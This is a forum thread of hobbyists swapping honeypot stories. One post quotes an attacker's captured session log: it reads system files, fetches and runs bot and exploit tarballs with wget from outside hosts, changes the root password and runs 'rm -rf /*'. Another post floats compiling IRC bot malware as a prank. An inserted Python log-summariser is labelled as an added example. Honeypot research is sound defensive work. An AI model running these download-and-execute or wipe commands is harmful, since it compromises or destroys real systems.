
Thread: My Honey

  1. #1
    Junior Member
    Join Date
    Apr 2006
    Posts
    10

    My Honey

    Hi Y'all

    I'm just curious if anyone out there actually runs a honeypot for pure amusement. I'm a bit of a freaky geek and do enjoy antagonizing botnets in my spare time just to see what's going on out there. And of course there are a few occasions when a real live goon pokes at my IP and the wire gets a little more heated up.

    I don't face the same challenges as those of you who actually get paid to manage huge networks of machines. I am just an enthusiastic hobbyist with a half dozen or so vanilla boxes, with a few of the more common services open to the WAN. I thought it might be interesting to share a few experiences about what's running around in your subnets.

    Bit Inquisitive
    Eating Crow Is Better With MyCrowSauce

  2. #2
    Oh hell yeah... here's the most activity from an attacker I've ever had... This is from a search engine honeynet. I love it when they revert to windows commands (dir... etc) when things break down. The other things like "Target in URL" and "No Referrer" are signatures that appear from different types of requests.

    "2006-02-11 22:28:29";"Target in URL;"
    "2006-02-11 22:28:36";"cat /etc/passwd;"
    "2006-02-16 17:18:26";"Target in URL;"
    "2006-02-16 17:18:28";"w;"
    "2006-02-16 17:18:33";"ps x;"
    "2006-02-16 17:18:36";"uname a;"
    "2006-02-16 17:18:39";"ls a;"
    "2006-02-16 17:18:43";"dir a;"
    "2006-02-16 17:18:46";"wget;"
    "2006-02-16 17:18:58";"wget xxx/bot/bot.tgz;"
    "2006-02-16 17:19:14";"tar zxvf bot.tgz;rm rf bot.tgz;"
    "2006-02-16 17:19:17";"ls a;"
    "2006-02-16 17:19:20";"ls;"
    "2006-02-16 17:19:28";"cd bot;ls;"
    "2006-02-16 17:19:34";"reboot;"
    "2006-02-18 20:34:20";"Target in URL;"
    "2006-02-18 20:34:22";"w;"
    "2006-02-18 20:34:25";"ps x;"
    "2006-02-18 20:34:27";"ls a;"
    "2006-02-18 20:34:30";"dir a;"
    "2006-02-18 20:34:38";"cd /dev/shm;dir;"
    "2006-02-18 20:34:40";"cd /dev/shm;ls;"
    "2006-02-19 19:20:57";"w;"
    "2006-02-19 19:20:55";"Target in URL;"
    "2006-02-21 18:32:43";"No Referer;"
    "2006-02-21 18:32:44";"w;"
    "2006-02-21 18:32:52";"ls a;"
    "2006-02-21 18:32:55";"ls a;"
    "2006-02-21 23:02:19";"No Referer;"
    "2006-02-22 21:21:23";"No Referer;"
    "2006-02-22 21:21:25";"w;"
    "2006-02-22 21:21:28";"wget;"
    "2006-02-22 21:21:30";"ls -a;"
    "2006-02-22 21:21:34";"dir -la;"
    "2006-02-22 21:21:38";"dir -la;"
    "2006-02-22 21:21:40";"dir -a;"
    "2006-02-22 21:21:59";"rm -rf /* &>/dev/null && kill -9 0;"
    "2006-02-25 15:48:28";"No Referer;"
    "2006-02-25 15:48:30";"w;"
    "2006-02-25 15:48:36";";"
    "2006-02-25 15:48:38";"ls -a;"
    "2006-02-25 15:48:41";"wget;"
    "2006-02-26 18:43:39";"No Referer;"
    "2006-02-26 18:43:46";"cat /etc/passwd;"
    "2006-02-28 17:28:37";"No Referer;"
    "2006-02-28 17:28:42";"w;"
    "2006-02-28 17:28:54";"No Referer;"
    "2006-02-28 17:28:55";"w;"
    "2006-03-02 21:58:09";"No Referer;"
    "2006-03-02 21:59:34";"wget http://xxx/ps/expl/ex.tgz;"
    "2006-03-02 21:59:37";";"
    "2006-03-02 21:59:40";"w;"
    "2006-03-02 21:59:45";"ls -a;"
    "2006-03-02 21:59:50";"tar zxvf ex.tgz;"
    "2006-03-02 22:02:01";"cd ex/toolz;ls -a;"
    "2006-03-02 22:02:04";"cd ex/toolz;dir -a;"
    "2006-03-02 22:02:10";"cd ex/toolz;./8081;"
    "2006-03-05 10:48:02";"No Referer;"
    "2006-03-05 10:48:04";"w;"
    "2006-03-05 10:52:36";"No Referer;"
    "2006-03-05 10:52:38";"w;"
    "2006-03-07 17:06:34";"No Referer;"
    "2006-03-07 17:06:37";"w;"
    "2006-03-07 17:06:40";"ps x;"
    "2006-03-07 17:06:42";"ls -a;"
    "2006-03-07 17:06:45";"dir -a;"
    "2006-03-07 17:06:48";"dir -a;"
    "2006-03-07 17:06:53";"cd /dev/shm;dir -a;"
    "2006-03-07 17:07:20";"No Referer;"
    "2006-03-11 22:10:11";"No Referer;"
    "2006-03-11 22:10:13";"w;"
    "2006-03-13 22:31:38";"No Referer;"
    "2006-03-13 22:31:39";"w;"
    "2006-03-13 22:31:43";"wget;"
    "2006-03-13 22:31:46";"w;"
    "2006-03-13 22:31:58";"passwd;"
    "2006-03-13 22:32:01";"ls -a;"
    "2006-03-13 22:32:39";"w;"
    "2006-03-13 22:33:03";"uid;"
    "2006-03-13 22:33:06";"id;"
    "2006-03-13 22:35:32";"/sbin/ifconfig |grep inet;"
    "2006-03-13 22:35:36";"/sbin/ifconfig |grep inet;"
    "2006-03-13 22:35:39";"cat /etc/hosts;"
    "2006-03-13 22:35:49";"hostnames;"
    "2006-03-13 22:35:52";"hostname;"
    "2006-03-13 22:35:55";"wget;"
    "2006-03-13 22:36:06";"wget http://xxx/ps/bot/fast.tgz;"
    "2006-03-13 22:36:20";"wget http://xxx/ps/psy/linux.tgz;"
    "2006-03-13 22:36:49";"wget ps.toyoo.be/ps/linux/ex.tgz;"
    "2006-03-13 22:36:58";"tar zxvf ex.tgz;rm -rf ex.tgz;"
    "2006-03-13 22:37:02";"dir -a;"
    "2006-03-13 22:37:04";"ls -a;"
    "2006-03-13 22:37:11";"ls -alF;"
    "2006-03-13 22:37:27";"cd ex/toolz;./8081;"
    "2006-03-13 22:37:44";"wget xxx/ps/psy/linux.tgz;"
    "2006-03-13 22:37:51";"tar zxvf linux.tgz;"
    "2006-03-13 22:38:04";"cd linux;PATH="." CROND;"
    "2006-03-13 22:39:39";"passwd root:root;"
    "2006-03-13 22:39:46";"passwd root;root;"
    "2006-03-13 22:40:14";"ls -alF;"
    "2006-03-13 22:40:27";"No Referer;"
    "2006-03-13 22:41:14";"ls -la;"
    "2006-03-13 22:41:18";"dir -alF;"
    "2006-03-13 22:41:22";"ls a;"
    "2006-03-13 22:41:25";"ls;"
    "2006-03-13 22:41:28";"dir;"
    "2006-03-13 22:49:07";"cd /var/tmp;ls -a;"
    "2006-03-13 22:49:15";"cd /var/tmp;ls -alF;"
    "2006-03-13 22:49:22";"pwd;"
    "2006-03-13 22:49:38";"cd /dev/shm;ls -alf;"
    "2006-03-13 22:49:47";"cd /usr;ls -a;"
    "2006-03-13 22:49:50";"cd /usr;ls;"
    "2006-03-13 22:49:59";"reboot;"
    "2006-03-13 22:50:02";"ps x;"
    "2006-03-13 22:50:06";"ps -aux;"
    "2006-03-13 22:52:55";"w;"
    "2006-03-13 22:54:24";"uname -a;"
    "2006-03-13 22:55:10";"cat /etc/issue;"
    "2006-03-13 22:55:37";"ls -a;"
    "2006-03-13 22:55:41";"ls -alf;"
    "2006-03-13 22:56:15";"cat /etc/passwd;"
    "2006-03-13 23:02:15";"passwd;"
    "2006-03-18 22:50:05";"Target in URL;"
    "2006-03-18 22:50:07";"w;"
    "2006-03-18 22:50:14";"psx;"
    "2006-03-18 22:50:16";"ps x;"
    "2006-04-02 10:00:06";"No Referer;"
    "2006-04-02 10:00:09";"w;"
    "2006-04-02 10:00:12";"ls -a;"
    "2006-04-02 10:00:14";"ps x;"
    "2006-04-02 10:00:18";"w;"
    "2006-04-12 23:00:00";"No Referer;"
    "2006-04-12 23:00:04";"w;"
    "2006-04-12 23:00:09";"ls -a;"
    "2006-04-12 23:00:13";"dir -a;"
    "2006-04-12 23:00:18";"rm -rf /*;"
    "2006-04-12 23:00:21";"ps x;"
    "2006-04-12 23:00:25";"ps -aux;"
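
    The log format quoted above (`"timestamp";"entry;"`, with the "Target in URL" / "No Referer" request tags mixed in among captured commands) lends itself to a small session summariser that separates tags from commands and flags the recon / download / unpack / execute / destructive stages of each visit. The following is an added example, not code from the post or from the poster's honeynet; the 30-minute session gap, the stage keywords and the sample lines (constructed in the same format, keeping the log's xxx host placeholder) are assumptions.

```python
import re
from datetime import datetime, timedelta
# Log line format used in the post above: "YYYY-MM-DD HH:MM:SS";"entry;"
LINE_RE = re.compile(r'^"(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)";"(.*);"$')
SIGNATURES = {"Target in URL", "No Referer"}  # request-type tags, not commands
# Coarse stage for a captured command (keywords are an assumption); first match wins
STAGES = [
    ("destructive", re.compile(r"\brm -rf /|\breboot\b|\bkill -9 0\b")),
    ("download", re.compile(r"\bwget\s+\S")),
    ("unpack", re.compile(r"\btar\s+\w*x")),
    ("execute", re.compile(r"(^|;)\s*\./\S+")),
    ("recon", re.compile(r"\b(w|id|uid|ps\s*-?a?u?x|uname|ifconfig|hostname|cat /etc/\w+)\b")),
]

# Constructed sample in the same format as the post's log (xxx host placeholder kept)
SAMPLE_LOG = """\
"2006-03-02 21:58:09";"No Referer;"
"2006-03-02 21:59:34";"wget http://xxx/ps/expl/ex.tgz;"
"2006-03-02 21:59:40";"w;"
"2006-03-02 21:59:50";"tar zxvf ex.tgz;"
"2006-03-02 22:02:10";"cd ex/toolz;./8081;"
"2006-04-12 23:00:00";"No Referer;"
"2006-04-12 23:00:04";"w;"
"2006-04-12 23:00:18";"rm -rf /*;"
"""

def parse(text):
    """Yield (timestamp, entry, is_signature); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            yield ts, m.group(2), m.group(2) in SIGNATURES

def stage_of(cmd):
    return next((name for name, rx in STAGES if rx.search(cmd)), "other")

def sessions(text, gap=timedelta(minutes=30)):
    """Split entries into sessions on `gap` of silence and summarise each one."""
    out = []
    for ts, entry, is_sig in parse(text):
        if not out or ts - out[-1]["end"] > gap:
            out.append({"start": ts, "end": ts, "commands": 0, "stages": set(), "urls": []})
        s = out[-1]
        s["end"] = max(s["end"], ts)  # the post's log is not strictly in time order
        if not is_sig:
            s["commands"] += 1
            s["stages"].add(stage_of(entry))
            s["urls"] += re.findall(r"wget\s+(\S+)", entry)
    return out
```

    Running `sessions(SAMPLE_LOG)` yields two visits: one that fetched and ran a tarball, and one that ended in `rm -rf /*`; the collected URLs are what you would retrieve for later analysis, as the replies below discuss.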

  3. #3
    Junior Member
    Join Date
    Apr 2006
    Posts
    10
    I see I'm not in the same league as you, Soda_Popinski. I don't have the balls of steel necessary to grant a shell even if it is a false one. My amusement since July 2005 has been primarily through Samba on the WAN and a few netcat listeners on whatever ports are in vogue on a given day. Did I say I don't grant a shell? Oops, I guess I do, but it is severely restricted with some creative netfilters.

    I am amazed at how many machines are still infected with old stuff and actively scanning subnets for new victims. I study their behavior in the hope of learning what responses quiet them down, and what excites them and attracts others from outside the subnet. My subnet (69.63) gets real busy sometimes. One host in particular, which calls itself Eastdell Warehouse, is always present and spewing NBSTATs. Ettercap says it's close to a Win98SE and another neat tool shows it's listening on vnc and vnc-http. If my Samba answers these NBSTATs, the botnet gets excited.

    Are you or is anyone else familiar with what is utilizing NBSTAT probes and listens on TCP ports 5800 and 5900? Is this host a scout for the botnet? And if anyone out there manages an ISP, please tell us why such a thing is allowed to persist.

    Curious like a NetCat
    Eating Crow Is Better With MyCrowSauce

  4. #4
    Elite Hacker
    Join Date
    Mar 2003
    Posts
    1,407
    Originally posted here by Soda_Popinsky
    Oh hell yeah... here's the most activity from an attacker I've ever had... This is from a search engine honeynet. I love it when they revert to windows commands (dir... etc) when things break down. The other things like "Target in URL" and "No Referrer" are signatures that appear from different types of requests.
    I see you cleansed the logs :P. Do you ever try downloading their tools to take a peek at them. I was going through my webserver logs the other day and tried to download tools people were trying to get through exploits. Only 3 of them were still existent. It was still fun though.

  5. #5
    Yeah, we get a lot of IRC tools, a lot of rootkits, DoS tools, web based backdoors... you name it...

    This appears a lot in many flavors
    http://www.google.com/search?hl=en&q...=Google+Search

    We even got some credit card validation tools.

  6. #6
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    i'm currently running nepenthes and honeyd (using a german dialin connection)
    nepenthes expects DCOM and submits new "stuff" to Norman's sandbox
    honeyd is simulating 'MS Exchange Server' on some ports
    both are logging to a blowcrypted IRC channel ...
    thus if you're bored ... you may have fun with downloaded malware
    ..or...
    maximum amusement on catching "botnet trackers"
    peeps are waiting at Norman to grab ..ehm ... steal some poorly configured and/or compiled bots
    all you need is an ircbot src code, a place where the bots would join, ...
    compile your malware, submit to Norman and just wait on the #chan you hardcoded in your bot
    never thought about ... but i promise 'real fun'
    really real fun when two 'visitors' are online same time .....
    Industry Kills Music.

  7. #7
    Junior Member
    Join Date
    Apr 2006
    Posts
    10
    Like I said, pure amusement. We have to restrain ourselves from becoming part of the problem. I limit my educationally lucrative playtime to layers 3 and 4 (though that Netfilter L7 patch looks interesting). Specific bots behave in specific ways; they exhibit a signature-like pattern over time which is easily graphed for a GUI look-n-feel.

    A firewall (or several) can be constructed to utilize the information generated betwixt this pattern's rhythm and thus incorporate a set of volume controls. How do we feel the WAN? Do we want more bass or treble today? Are we more base or trouble today? I enjoy listening to low beats as opposed to high pitched screaming; that is annoying. Through careful use of the many targets one can respond with, intuitive timing and a few other criteria, one can actually influence the rhythm, and usually without climbing much higher up the stack than L4. And this can be shown with pretty images too!

    Personally I never tried initiating any gets for that which is offered by any bots or otherwise. I let them put things from time to time but I never botHERD to see what happens with execution; primarily because I ain't got won of them machines you needs to Do'S it wit'. My machines mind their own business. However, when anyone comes knocking, I have the potentially amusing opportunity of answering the door and inviting them in for tea or coffee. Chrootin' the Chit Can be good clean fun I'll not DENY that. But if I don't like the conversation or it looks like you're casing my home, y'all might get asked to leave or feel a door slam on y'ass without so much as a goodbye.

    I just saw an NBSTAT calling itself FAMILY and I'm reminded of this holiday weekend. I urge you good folks out there to remember and rejoice in the SHe from which you were bourne, your mothers!

    Composed to good low beats from Limp Bizkit - New Old Songs CD track 16 My Way - Pistols' Dancehall Dub Remixed by THE DUB PISTOLS
    Eating Crow Is Better With MyCrowSauce

  8. #8
    Senior Member
    Join Date
    Aug 2003
    Posts
    185
    ehm...farmer ...you're a crazy guy
    i paid for having fun, don't ya?
    do you care about?
    and in case there are misunderstandings (the rest in German)
    i have a few logs that will still make me laugh years from now
    i don't know whether it makes sense to post them
    but not one drone came with sensible parameters
    not even the ones from *.umich.edu
    Industry Kills Music.

  9. #9
    Junior Member
    Join Date
    Apr 2006
    Posts
    10
    ehm...farmer ...you're a crazy guy
    200
    i paid for having fun, don't ya?
    402
    do you care about?
    405

    Frank Zappa - Joe's Garage - The Central Scrutinizer - "...The white zone is for loading and unloading only. If you have to load or unload, go to the white zone. You'll love it, it's a way of life..." IE telefunkin' U47.
    Eating Crow Is Better With MyCrowSauce

  10. #10
    Computer Forensics
    Join Date
    Jul 2001
    Posts
    672
    I'm in the same boat as Soda. I've been running a research honeynet for a few years now and have collected upwards to 50 tools at a time. I collect more logs than anyone should ever have to sift through..oh the humanity.
    Antionline in a nutshell
    "You're putting the fate of the world in the hands of a bunch of idiots I wouldn't trust with a potato gun"

    Trust your Technolust
